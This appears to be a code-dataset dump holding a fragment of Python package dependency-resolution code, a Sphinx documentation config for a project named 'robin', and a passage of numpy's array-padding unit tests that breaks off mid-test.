        while todo:
            dist = todo.pop()
            name = dist.key     # case-insensitive
            if name not in self.dists_by_name:
                self.add_distribution(dist)
            else:
                #import pdb; pdb.set_trace()
                other = self.dists_by_name[name]
                if other != dist:
                    self.try_to_replace(dist, other, problems)

            # Gather this dist's requirements: install-time, build-time,
            # and any requested meta extras (for the install set only).
            ireqts = dist.run_requires | dist.meta_requires
            sreqts = dist.build_requires
            ereqts = set()
            if meta_extras and dist in install_dists:
                for key in ('test', 'build', 'dev'):
                    e = ':%s:' % key
                    if e in meta_extras:
                        ereqts |= getattr(dist, '%s_requires' % key)
            all_reqts = ireqts | sreqts | ereqts
            for r in all_reqts:
                providers = self.find_providers(r)
                if not providers:
                    logger.debug('No providers found for %r', r)
                    provider = self.locator.locate(r, prereleases=prereleases)
                    # If no provider is found and we didn't consider
                    # prereleases, consider them now.
                    if provider is None and not prereleases:
                        provider = self.locator.locate(r, prereleases=True)
                    if provider is None:
                        logger.debug('Cannot satisfy %r', r)
                        problems.add(('unsatisfied', r))
                    else:
                        n, v = provider.key, provider.version
                        if (n, v) not in self.dists:
                            todo.add(provider)
                        providers.add(provider)
                        if r in ireqts and dist in install_dists:
                            install_dists.add(provider)
                            logger.debug('Adding %s to install_dists',
                                         provider.name_and_version)
                for p in providers:
                    name = p.key
                    if name not in self.dists_by_name:
                        self.reqts.setdefault(p, set()).add(r)
                    else:
                        other = self.dists_by_name[name]
                        if other != p:
                            # see if other can be replaced by p
                            self.try_to_replace(p, other, problems)

        # Mark distributions that are needed only at build time.
        dists = set(self.dists.values())
        for dist in dists:
            dist.build_time_dependency = dist not in install_dists
            if dist.build_time_dependency:
                logger.debug('%s is a build-time dependency only.',
                             dist.name_and_version)
        logger.debug('find done for %s', odist)
        return dists, problems
| [
"rossavelrs@yahoo.com"
] | rossavelrs@yahoo.com |
d8ca834b99ba70263bf23cc4cca4378f4ddc1fc7 | 6aee7149a16a71389e0916de1854f4edea026c2b | /docs/conf.py | ec1c141aa03b02802683dd91900e56f31946a7a8 | [
"BSD-2-Clause"
] | permissive | orionzhou/maize | d5e3c66af285d5d3a490fe09e85f840bd033240a | 605c895c397c9f614955a6df8eed0edc553f543d | refs/heads/main | 2022-12-27T02:08:26.747564 | 2022-11-24T07:57:30 | 2022-11-24T07:57:30 | 11,537,821 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,192 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# robin documentation build configuration file, created by
# sphinx-quickstart on Sun Dec 11 23:07:57 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'robin'
copyright = '2016, Peng Zhou'
author = 'Peng Zhou'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
# NOTE(review): recent Sphinx releases warn on language = None and expect a
# language code such as 'en' -- confirm against the Sphinx version in use.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinxdoc'
# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'robindoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    # 'papersize': 'letterpaper',
    # The font size ('10pt', '11pt' or '12pt').
    #
    # 'pointsize': '10pt',
    # Additional stuff for the LaTeX preamble.
    #
    # 'preamble': '',
    # Latex figure (float) alignment
    #
    # 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'robin.tex', 'robin Documentation',
     'Peng Zhou', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'robin', 'robin Documentation',
     [author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'robin', 'robin Documentation',
     author, 'robin', 'One line description of project.',
     'Miscellaneous'),
]
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
| [
"zhoupenggeni@gmail.com"
] | zhoupenggeni@gmail.com |
05e23e24877e1c3fee0d86645925b9eededee90d | d77a0d5a18af141d36005eba1769f7384f5ce1d4 | /mDataAn_venv/Lib/site-packages/numpy/lib/tests/test_arraypad.py | fe318a8907d837f134820534f6c890dec499249d | [] | no_license | LukasPolon/MData | 32d756d0df8c8847cf45b8def6e5ef760963d895 | 2178a0b2f60c4c638fd696a6e11b0ef801724bf4 | refs/heads/master | 2022-12-11T15:02:07.528855 | 2018-01-07T16:22:58 | 2018-01-07T16:22:58 | 99,687,079 | 1 | 0 | null | 2021-06-01T22:04:39 | 2017-08-08T11:51:11 | Python | UTF-8 | Python | false | false | 44,328 | py | """Tests for the array padding functions.
"""
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import (assert_array_equal, assert_raises, assert_allclose,
TestCase)
from numpy.lib import pad
class TestConditionalShortcuts(TestCase):
    """Padding shortcut paths must agree with the general implementation."""

    def test_zero_padding_shortcuts(self):
        # Zero-width padding in every axis should return the input unchanged.
        arr = np.arange(120).reshape(4, 5, 6)
        widths = [(0, 0)] * arr.ndim
        for mode in ('constant', 'edge', 'linear_ramp', 'maximum', 'mean',
                     'median', 'minimum', 'reflect', 'symmetric', 'wrap'):
            assert_array_equal(arr, pad(arr, widths, mode=mode))

    def test_shallow_statistic_range(self):
        # With stat_length=1 the statistic modes degenerate to 'edge'.
        arr = np.arange(120).reshape(4, 5, 6)
        widths = [(1, 1)] * arr.ndim
        for mode in ('maximum', 'mean', 'median', 'minimum'):
            assert_array_equal(pad(arr, widths, mode='edge'),
                               pad(arr, widths, mode=mode, stat_length=1))

    def test_clip_statistic_range(self):
        # A stat_length longer than the axis is clipped to the axis length.
        arr = np.arange(30).reshape(5, 6)
        widths = [(3, 3)] * arr.ndim
        for mode in ('maximum', 'mean', 'median', 'minimum'):
            assert_array_equal(pad(arr, widths, mode=mode),
                               pad(arr, widths, mode=mode, stat_length=30))
class TestStatistic(TestCase):
    """Tests for the statistic-based pad modes: mean, maximum, minimum, median.

    Each test pads a small known array and compares against a hand-written
    expected array (``b``).
    """

    def test_check_mean_stat_length(self):
        # stat_length=(2, 3): mean of first 2 values (0.5) on the left,
        # mean of last 3 values (98.) on the right.
        a = np.arange(100).astype('f')
        a = pad(a, ((25, 20), ), 'mean', stat_length=((2, 3), ))
        b = np.array(
            [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5,
             0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5,
             0.5, 0.5, 0.5, 0.5, 0.5,
             0., 1., 2., 3., 4., 5., 6., 7., 8., 9.,
             10., 11., 12., 13., 14., 15., 16., 17., 18., 19.,
             20., 21., 22., 23., 24., 25., 26., 27., 28., 29.,
             30., 31., 32., 33., 34., 35., 36., 37., 38., 39.,
             40., 41., 42., 43., 44., 45., 46., 47., 48., 49.,
             50., 51., 52., 53., 54., 55., 56., 57., 58., 59.,
             60., 61., 62., 63., 64., 65., 66., 67., 68., 69.,
             70., 71., 72., 73., 74., 75., 76., 77., 78., 79.,
             80., 81., 82., 83., 84., 85., 86., 87., 88., 89.,
             90., 91., 92., 93., 94., 95., 96., 97., 98., 99.,
             98., 98., 98., 98., 98., 98., 98., 98., 98., 98.,
             98., 98., 98., 98., 98., 98., 98., 98., 98., 98.
             ])
        assert_array_equal(a, b)

    def test_check_maximum_1(self):
        # Maximum of the whole array (99) fills both pads.
        a = np.arange(100)
        a = pad(a, (25, 20), 'maximum')
        b = np.array(
            [99, 99, 99, 99, 99, 99, 99, 99, 99, 99,
             99, 99, 99, 99, 99, 99, 99, 99, 99, 99,
             99, 99, 99, 99, 99,
             0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
             10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
             20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
             30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
             40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
             50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
             60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
             70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
             80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
             90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
             99, 99, 99, 99, 99, 99, 99, 99, 99, 99,
             99, 99, 99, 99, 99, 99, 99, 99, 99, 99]
            )
        assert_array_equal(a, b)

    def test_check_maximum_2(self):
        # Same as above but with values shifted by one (maximum 100).
        a = np.arange(100) + 1
        a = pad(a, (25, 20), 'maximum')
        b = np.array(
            [100, 100, 100, 100, 100, 100, 100, 100, 100, 100,
             100, 100, 100, 100, 100, 100, 100, 100, 100, 100,
             100, 100, 100, 100, 100,
             1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
             11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
             21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
             31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
             41, 42, 43, 44, 45, 46, 47, 48, 49, 50,
             51, 52, 53, 54, 55, 56, 57, 58, 59, 60,
             61, 62, 63, 64, 65, 66, 67, 68, 69, 70,
             71, 72, 73, 74, 75, 76, 77, 78, 79, 80,
             81, 82, 83, 84, 85, 86, 87, 88, 89, 90,
             91, 92, 93, 94, 95, 96, 97, 98, 99, 100,
             100, 100, 100, 100, 100, 100, 100, 100, 100, 100,
             100, 100, 100, 100, 100, 100, 100, 100, 100, 100]
            )
        assert_array_equal(a, b)

    def test_check_maximum_stat_length(self):
        # Only the first/last 10 values feed the maximum: 10 left, 100 right.
        a = np.arange(100) + 1
        a = pad(a, (25, 20), 'maximum', stat_length=10)
        b = np.array(
            [10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
             10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
             10, 10, 10, 10, 10,
             1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
             11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
             21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
             31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
             41, 42, 43, 44, 45, 46, 47, 48, 49, 50,
             51, 52, 53, 54, 55, 56, 57, 58, 59, 60,
             61, 62, 63, 64, 65, 66, 67, 68, 69, 70,
             71, 72, 73, 74, 75, 76, 77, 78, 79, 80,
             81, 82, 83, 84, 85, 86, 87, 88, 89, 90,
             91, 92, 93, 94, 95, 96, 97, 98, 99, 100,
             100, 100, 100, 100, 100, 100, 100, 100, 100, 100,
             100, 100, 100, 100, 100, 100, 100, 100, 100, 100]
            )
        assert_array_equal(a, b)

    def test_check_minimum_1(self):
        # Minimum of the whole array (0) fills both pads.
        a = np.arange(100)
        a = pad(a, (25, 20), 'minimum')
        b = np.array(
            [0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
             0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
             0, 0, 0, 0, 0,
             0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
             10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
             20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
             30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
             40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
             50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
             60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
             70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
             80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
             90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
             0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
             0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
            )
        assert_array_equal(a, b)

    def test_check_minimum_2(self):
        # Same as above but with values shifted by two (minimum 2).
        a = np.arange(100) + 2
        a = pad(a, (25, 20), 'minimum')
        b = np.array(
            [2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
             2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
             2, 2, 2, 2, 2,
             2, 3, 4, 5, 6, 7, 8, 9, 10, 11,
             12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
             22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
             32, 33, 34, 35, 36, 37, 38, 39, 40, 41,
             42, 43, 44, 45, 46, 47, 48, 49, 50, 51,
             52, 53, 54, 55, 56, 57, 58, 59, 60, 61,
             62, 63, 64, 65, 66, 67, 68, 69, 70, 71,
             72, 73, 74, 75, 76, 77, 78, 79, 80, 81,
             82, 83, 84, 85, 86, 87, 88, 89, 90, 91,
             92, 93, 94, 95, 96, 97, 98, 99, 100, 101,
             2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
             2, 2, 2, 2, 2, 2, 2, 2, 2, 2]
            )
        assert_array_equal(a, b)

    def test_check_minimum_stat_length(self):
        # Only the first/last 10 values feed the minimum: 1 left, 91 right.
        a = np.arange(100) + 1
        a = pad(a, (25, 20), 'minimum', stat_length=10)
        b = np.array(
            [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
              1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
              1, 1, 1, 1, 1,
              1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
             11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
             21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
             31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
             41, 42, 43, 44, 45, 46, 47, 48, 49, 50,
             51, 52, 53, 54, 55, 56, 57, 58, 59, 60,
             61, 62, 63, 64, 65, 66, 67, 68, 69, 70,
             71, 72, 73, 74, 75, 76, 77, 78, 79, 80,
             81, 82, 83, 84, 85, 86, 87, 88, 89, 90,
             91, 92, 93, 94, 95, 96, 97, 98, 99, 100,
             91, 91, 91, 91, 91, 91, 91, 91, 91, 91,
             91, 91, 91, 91, 91, 91, 91, 91, 91, 91]
            )
        assert_array_equal(a, b)

    def test_check_median(self):
        # Median of 0..99 is 49.5.
        a = np.arange(100).astype('f')
        a = pad(a, (25, 20), 'median')
        b = np.array(
            [49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
             49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
             49.5, 49.5, 49.5, 49.5, 49.5,
             0., 1., 2., 3., 4., 5., 6., 7., 8., 9.,
             10., 11., 12., 13., 14., 15., 16., 17., 18., 19.,
             20., 21., 22., 23., 24., 25., 26., 27., 28., 29.,
             30., 31., 32., 33., 34., 35., 36., 37., 38., 39.,
             40., 41., 42., 43., 44., 45., 46., 47., 48., 49.,
             50., 51., 52., 53., 54., 55., 56., 57., 58., 59.,
             60., 61., 62., 63., 64., 65., 66., 67., 68., 69.,
             70., 71., 72., 73., 74., 75., 76., 77., 78., 79.,
             80., 81., 82., 83., 84., 85., 86., 87., 88., 89.,
             90., 91., 92., 93., 94., 95., 96., 97., 98., 99.,
             49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
             49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5]
            )
        assert_array_equal(a, b)

    def test_check_median_01(self):
        # 2-D median padding: each pad value is the median along that axis.
        a = np.array([[3, 1, 4], [4, 5, 9], [9, 8, 2]])
        a = pad(a, 1, 'median')
        b = np.array(
            [[4, 4, 5, 4, 4],
             [3, 3, 1, 4, 3],
             [5, 4, 5, 9, 5],
             [8, 9, 8, 2, 8],
             [4, 4, 5, 4, 4]]
            )
        assert_array_equal(a, b)

    def test_check_median_02(self):
        # Same data padded via the transpose; axis order changes the result.
        a = np.array([[3, 1, 4], [4, 5, 9], [9, 8, 2]])
        a = pad(a.T, 1, 'median').T
        b = np.array(
            [[5, 4, 5, 4, 5],
             [3, 3, 1, 4, 3],
             [5, 4, 5, 9, 5],
             [8, 9, 8, 2, 8],
             [5, 4, 5, 4, 5]]
            )
        assert_array_equal(a, b)

    def test_check_median_stat_length(self):
        # Medians of the first 3 (0, 2, 2 -> 2) and last 5 values (-> 96).
        a = np.arange(100).astype('f')
        a[1] = 2.
        a[97] = 96.
        a = pad(a, (25, 20), 'median', stat_length=(3, 5))
        b = np.array(
            [ 2., 2., 2., 2., 2., 2., 2., 2., 2., 2.,
              2., 2., 2., 2., 2., 2., 2., 2., 2., 2.,
              2., 2., 2., 2., 2.,
              0., 2., 2., 3., 4., 5., 6., 7., 8., 9.,
             10., 11., 12., 13., 14., 15., 16., 17., 18., 19.,
             20., 21., 22., 23., 24., 25., 26., 27., 28., 29.,
             30., 31., 32., 33., 34., 35., 36., 37., 38., 39.,
             40., 41., 42., 43., 44., 45., 46., 47., 48., 49.,
             50., 51., 52., 53., 54., 55., 56., 57., 58., 59.,
             60., 61., 62., 63., 64., 65., 66., 67., 68., 69.,
             70., 71., 72., 73., 74., 75., 76., 77., 78., 79.,
             80., 81., 82., 83., 84., 85., 86., 87., 88., 89.,
             90., 91., 92., 93., 94., 95., 96., 96., 98., 99.,
             96., 96., 96., 96., 96., 96., 96., 96., 96., 96.,
             96., 96., 96., 96., 96., 96., 96., 96., 96., 96.]
            )
        assert_array_equal(a, b)

    def test_check_mean_shape_one(self):
        # Mean padding of a single-row 2-D array broadcasts the row values.
        a = [[4, 5, 6]]
        a = pad(a, (5, 7), 'mean', stat_length=2)
        b = np.array(
            [[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
             [4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
             [4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
             [4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
             [4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
             [4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
             [4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
             [4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
             [4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
             [4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
             [4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
             [4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
             [4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6]]
            )
        assert_array_equal(a, b)

    def test_check_mean_2(self):
        # Mean of 0..99 is 49.5; fills both pads.
        a = np.arange(100).astype('f')
        a = pad(a, (25, 20), 'mean')
        b = np.array(
            [49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
             49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
             49.5, 49.5, 49.5, 49.5, 49.5,
             0., 1., 2., 3., 4., 5., 6., 7., 8., 9.,
             10., 11., 12., 13., 14., 15., 16., 17., 18., 19.,
             20., 21., 22., 23., 24., 25., 26., 27., 28., 29.,
             30., 31., 32., 33., 34., 35., 36., 37., 38., 39.,
             40., 41., 42., 43., 44., 45., 46., 47., 48., 49.,
             50., 51., 52., 53., 54., 55., 56., 57., 58., 59.,
             60., 61., 62., 63., 64., 65., 66., 67., 68., 69.,
             70., 71., 72., 73., 74., 75., 76., 77., 78., 79.,
             80., 81., 82., 83., 84., 85., 86., 87., 88., 89.,
             90., 91., 92., 93., 94., 95., 96., 97., 98., 99.,
             49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
             49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5]
            )
        assert_array_equal(a, b)
class TestConstant(TestCase):
def test_check_constant(self):
a = np.arange(100)
a = pad(a, (25, 20), 'constant', constant_values=(10, 20))
b = np.array(
[10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
10, 10, 10, 10, 10,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
20, 20, 20, 20, 20, 20, 20, 20, 20, 20,
20, 20, 20, 20, 20, 20, 20, 20, 20, 20]
)
assert_array_equal(a, b)
def test_check_constant_zeros(self):
a = np.arange(100)
a = pad(a, (25, 20), 'constant')
b = np.array(
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
)
assert_array_equal(a, b)
def test_check_constant_float(self):
# If input array is int, but constant_values are float, the dtype of
# the array to be padded is kept
arr = np.arange(30).reshape(5, 6)
test = pad(arr, (1, 2), mode='constant',
constant_values=1.1)
expected = np.array(
[[ 1, 1, 1, 1, 1, 1, 1, 1, 1],
[ 1, 0, 1, 2, 3, 4, 5, 1, 1],
[ 1, 6, 7, 8, 9, 10, 11, 1, 1],
[ 1, 12, 13, 14, 15, 16, 17, 1, 1],
[ 1, 18, 19, 20, 21, 22, 23, 1, 1],
[ 1, 24, 25, 26, 27, 28, 29, 1, 1],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1]]
)
assert_allclose(test, expected)
def test_check_constant_float2(self):
# If input array is float, and constant_values are float, the dtype of
# the array to be padded is kept - here retaining the float constants
arr = np.arange(30).reshape(5, 6)
arr_float = arr.astype(np.float64)
test = pad(arr_float, ((1, 2), (1, 2)), mode='constant',
constant_values=1.1)
expected = np.array(
[[ 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1],
[ 1.1, 0. , 1. , 2. , 3. , 4. , 5. , 1.1, 1.1],
[ 1.1, 6. , 7. , 8. , 9. , 10. , 11. , 1.1, 1.1],
[ 1.1, 12. , 13. , 14. , 15. , 16. , 17. , 1.1, 1.1],
[ 1.1, 18. , 19. , 20. , 21. , 22. , 23. , 1.1, 1.1],
[ 1.1, 24. , 25. , 26. , 27. , 28. , 29. , 1.1, 1.1],
[ 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1],
[ 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1]]
)
assert_allclose(test, expected)
    def test_check_constant_float3(self):
        """Distinct before/after constants: -1.1 leading, -1.2 trailing."""
        a = np.arange(100, dtype=float)
        a = pad(a, (25, 20), 'constant', constant_values=(-1.1, -1.2))
        b = np.array(
            [-1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1,
            -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1,
            -1.1, -1.1, -1.1, -1.1, -1.1,
            0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
            10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
            20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
            30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
            40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
            50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
            60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
            70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
            80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
            90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
            -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2,
            -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2]
            )
        assert_allclose(a, b)
    def test_check_constant_odd_pad_amount(self):
        """Per-axis single-element shorthand ((1,), (2,)) pads both sides."""
        arr = np.arange(30).reshape(5, 6)
        test = pad(arr, ((1,), (2,)), mode='constant',
                   constant_values=3)
        # one row of 3s top and bottom, two columns of 3s left and right
        expected = np.array(
            [[ 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
            [ 3, 3, 0, 1, 2, 3, 4, 5, 3, 3],
            [ 3, 3, 6, 7, 8, 9, 10, 11, 3, 3],
            [ 3, 3, 12, 13, 14, 15, 16, 17, 3, 3],
            [ 3, 3, 18, 19, 20, 21, 22, 23, 3, 3],
            [ 3, 3, 24, 25, 26, 27, 28, 29, 3, 3],
            [ 3, 3, 3, 3, 3, 3, 3, 3, 3, 3]]
            )
        assert_allclose(test, expected)
    def test_check_constant_pad_2d(self):
        """Per-axis (before, after) constant_values: ((1, 2), (3, 4))."""
        arr = np.arange(4).reshape(2, 2)
        # rows padded with 1 above / 2 below, columns with 3 left / 4 right
        test = np.lib.pad(arr, ((1, 2), (1, 3)), mode='constant',
                          constant_values=((1, 2), (3, 4)))
        expected = np.array(
            [[3, 1, 1, 4, 4, 4],
            [3, 0, 1, 4, 4, 4],
            [3, 2, 3, 4, 4, 4],
            [3, 2, 2, 4, 4, 4],
            [3, 2, 2, 4, 4, 4]]
            )
        assert_allclose(test, expected)
class TestLinearRamp(TestCase):
    """Tests for mode='linear_ramp': pad values ramp linearly from the
    array edge towards the requested end_values."""

    def test_check_simple(self):
        """1-D ramp from end_values (4, 5) into the edge values 0 and 99."""
        padded = pad(np.arange(100).astype('f'), (25, 20), 'linear_ramp',
                     end_values=(4, 5))
        # left: 26 evenly spaced values 4 -> 0, excluding the edge itself;
        # right: 21 evenly spaced values 99 -> 5, excluding the edge itself
        left = np.linspace(4.0, 0.0, 26)[:25]
        right = np.linspace(99.0, 5.0, 21)[1:]
        expected = np.concatenate([left, np.arange(100, dtype=float), right])
        assert_allclose(padded, expected, rtol=1e-5, atol=1e-5)

    def test_check_2d(self):
        """2-D ramp towards zero on every side."""
        data = np.arange(20).reshape(4, 5).astype(np.float64)
        result = pad(data, (2, 2), mode='linear_ramp', end_values=(0, 0))
        expected = np.array(
            [[0.,  0.,   0.,  0.,  0.,  0.,  0.,   0.,  0.],
             [0.,  0.,   0., 0.5,  1., 1.5,  2.,   1.,  0.],
